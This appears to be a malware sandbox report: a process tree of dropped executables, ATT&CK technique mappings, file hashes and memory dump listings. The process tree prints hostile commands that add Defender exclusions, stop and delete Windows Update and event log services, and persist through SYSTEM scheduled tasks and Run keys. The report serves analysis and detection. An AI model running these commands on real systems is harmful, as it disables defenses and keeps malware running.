  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:2412
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:2180
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:1592
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:2864
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2156
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1032
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1880
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1316
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2708
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:2476
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:1476
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:268
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:376
- - C:\Users\Admin\AppData\Local\Temp\mklnsegsd.exe
    "C:\Users\Admin\AppData\Local\Temp\mklnsegsd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1036
  - - C:\Windows\system32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2920
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:2784
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:1508
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:2936
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:1728
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:1516
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:1740
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:1760
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        Modifies security service
        
        PID:2272
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:2648
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:2288
  - - C:\Windows\system32\cmd.exe
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of WriteProcessMemory
      PID:2796
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2932
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1984
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1604
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Barac /tr "'C:\Program Files\Cuis\bon\Bara.exe'"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3012
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Drops file in Windows directory
      PID:2092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2152
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn Barac
        5⤵
        
        PID:1968
- - C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe
    "C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1900
  - - C:\Windows\system32\schtasks.exe
      "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2740
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2768
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1928

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1095366276869024868-2119681972349881035-336435787992728310-269971531-209500190"
1⤵
PID:1312

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "26851910118321128751620390806-231183534-1380072445658495179-2051987523-278575547"
1⤵
PID:1192

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10156249691574749117-1327706937-1767920576-4564921895544616082065593783-2130926281"
1⤵
PID:2380

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2011424703-619716270-2018466897649570822-1287893941-4863467951250057571036926201"
1⤵
PID:2912

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11064228651403314333130496686416597961862127259495-6133028641428023888-672822502"
1⤵
PID:2488

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-97001561627071377994824058-287122401-2024840508-114485273211859219992114031039"
1⤵
PID:1724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe

Filesize
502KB

MD5
ea001f076677c9b0dd774ae670efdf63

SHA1
37a4466f3c38b60a30fc1073b9d0b2d2d0e692e5

SHA256
19fd26fa3f76141cc05ef0c0c96ea91dcf900e760b57195f216a113b1cf69100

SHA512
6d634f47c0901e18cb159732c0ca1e7e6c930d16b18d0daea717c252ec7ddd37e90745b69512313dbbdac9099059b6f7cbe07044a71b36231c027818810c8652

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AUXU8PTGXJTT8TQ4QBG6.temp

Filesize
7KB

MD5
112918326bbfcf968dce29fb10c6e9f3

SHA1
afc3f0574fedf79c2431efa1792953a3bd64c623

SHA256
4203b7ca0563f08b7fc14ea0db1adeff7ec9652c0737af56051ca31f636ff545

SHA512
a3a414a999c41ba817d6f16da373f85165d54193734a38378bfa7d347f9063f22a86a787c40c6c99c5d2e05b8755f92930e52b6a537c721c7d1609f372ec80b2

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
1KB

MD5
468a3efbeb430dea9c9319d258e62a43

SHA1
f1f168dcd319053b9939959fe625c0df523cb3de

SHA256
4ff65f03c93ab65a83516806d09bc47bf0dde8f38a112eee8185aaf846533836

SHA512
ed59fbcae9f1e8f155be11eb379a5c756cb442320a116006a9ce045a067f88ef41a566335f5cdb569f99b3e6a22b09e7bfd4e6449924749f6ab37bf692bc69cd

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
1KB

MD5
852366aba34d23d447de037e7314468c

SHA1
f443471094c51e2a72475339c64eae02b28d8ad8

SHA256
299c704b02d4b39b4f253e90d8045ebfb999eadbbdd7e39e37fb81acf85d00b8

SHA512
c33f055e07a94059b42e2474b0c3b572d1213882184564039922038250c27b4222db2d9e674d6452e1fd18544731e7c12e0004683503e19ea001fd505b0e3f1d

Download Submit
\Program Files\Cuis\bon\Bara.exe

Filesize
2.4MB

MD5
b70a5e7260b025e39b8016523a1f2d64

SHA1
aea86a6e4d9ba908d9e141a5d4166ba1e3b1b6a7

SHA256
fd7327848bb13a7a2919447c1818935482527bcc7de7da835b907826b7488490

SHA512
a0b63100553d8ae1bbc6471cc0b63499d82ff1503dc17f46cb1aee07a1332a053c485b74bbe7670638ff0d069496751f9326f9bbb6df96f794acb73969b182ca

Download Submit
\Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe

Filesize
2.7MB

MD5
952f360a4651f948be3a673178631641

SHA1
60e58b89cfce587aa121baf431d55cbbecd21545

SHA256
a92133787af66e6d68a301ef087e4116f5cab3f538d8ec5e5e0eb95cecc68ea8

SHA512
af346587c95ac9e120ce63d46b22992e3ab69702af602ea6d7a16c3dcf9d2f7f19903233646cef8153aa877f5773c486db504ea6534bcbc3b136bd07b62483d0

Download Submit
\Users\Admin\AppData\Local\Temp\mklnsegsd.exe

Filesize
2.4MB

MD5
8e40252356a6fb3f8f52d1effa2c2c3c

SHA1
3bf5461b591a53dcb48ea2dc6535cd90aa786c4e

SHA256
de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a

SHA512
c3286845aa20f9bf06bfbccb63c12a72ed223fc054881a66b643f55f81aa0df868c28199090cab6d37552b268615dc0605587a85f0d4ec6ee6d5ed25a5739a2a

Download Submit
memory/420-91-0x000007FEBE080000-0x000007FEBE090000-memory.dmp

Filesize
64KB

Download
memory/420-90-0x0000000000B00000-0x0000000000B2A000-memory.dmp

Filesize
168KB

Download
memory/420-92-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/420-87-0x0000000000AD0000-0x0000000000AF3000-memory.dmp

Filesize
140KB

Download
memory/420-89-0x0000000000AD0000-0x0000000000AF3000-memory.dmp

Filesize
140KB

Download
memory/476-110-0x000007FEBE080000-0x000007FEBE090000-memory.dmp

Filesize
64KB

Download
memory/476-111-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/476-109-0x0000000000160000-0x000000000018A000-memory.dmp

Filesize
168KB

Download
memory/492-117-0x0000000000160000-0x000000000018A000-memory.dmp

Filesize
168KB

Download
memory/536-54-0x000000013FB80000-0x000000013FDE6000-memory.dmp

Filesize
2.4MB

Download
memory/536-37-0x000000013FB80000-0x000000013FDE6000-memory.dmp

Filesize
2.4MB

Download
memory/560-81-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/560-80-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/560-83-0x0000000077160000-0x000000007727F000-memory.dmp

Filesize
1.1MB

Download
memory/560-82-0x0000000077380000-0x0000000077529000-memory.dmp

Filesize
1.7MB

Download
memory/560-84-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/596-114-0x000007FEBE080000-0x000007FEBE090000-memory.dmp

Filesize
64KB

Download
memory/596-112-0x0000000000280000-0x00000000002AA000-memory.dmp

Filesize
168KB

Download
memory/596-115-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/672-123-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/672-122-0x000007FEBE080000-0x000007FEBE090000-memory.dmp

Filesize
64KB

Download
memory/672-121-0x0000000000510000-0x000000000053A000-memory.dmp

Filesize
168KB

Download
memory/760-75-0x000000001A070000-0x000000001A352000-memory.dmp

Filesize
2.9MB

Download
memory/760-78-0x0000000077380000-0x0000000077529000-memory.dmp

Filesize
1.7MB

Download
memory/760-79-0x0000000077160000-0x000000007727F000-memory.dmp

Filesize
1.1MB

Download
memory/760-77-0x00000000013B0000-0x00000000013F0000-memory.dmp

Filesize
256KB

Download
memory/760-76-0x0000000000870000-0x0000000000878000-memory.dmp

Filesize
32KB

Download
memory/1036-42-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/1036-43-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/1604-50-0x00000000020F0000-0x00000000020F8000-memory.dmp

Filesize
32KB

Download
memory/1604-49-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/1792-548-0x0000000000CA0000-0x0000000000CA8000-memory.dmp

Filesize
32KB

Download
memory/1792-547-0x0000000019AE0000-0x0000000019DC2000-memory.dmp

Filesize
2.9MB

Download
memory/1900-28-0x000007FEF5723000-0x000007FEF5724000-memory.dmp

Filesize
4KB

Download
memory/1900-29-0x00000000013C0000-0x0000000001444000-memory.dmp

Filesize
528KB

Download
memory/1900-36-0x000007FEF5720000-0x000007FEF610C000-memory.dmp

Filesize
9.9MB

Download
memory/1900-30-0x000007FEF5720000-0x000007FEF610C000-memory.dmp

Filesize
9.9MB

Download
memory/2092-71-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/2768-35-0x0000000000F00000-0x0000000000F84000-memory.dmp

Filesize
528KB

Download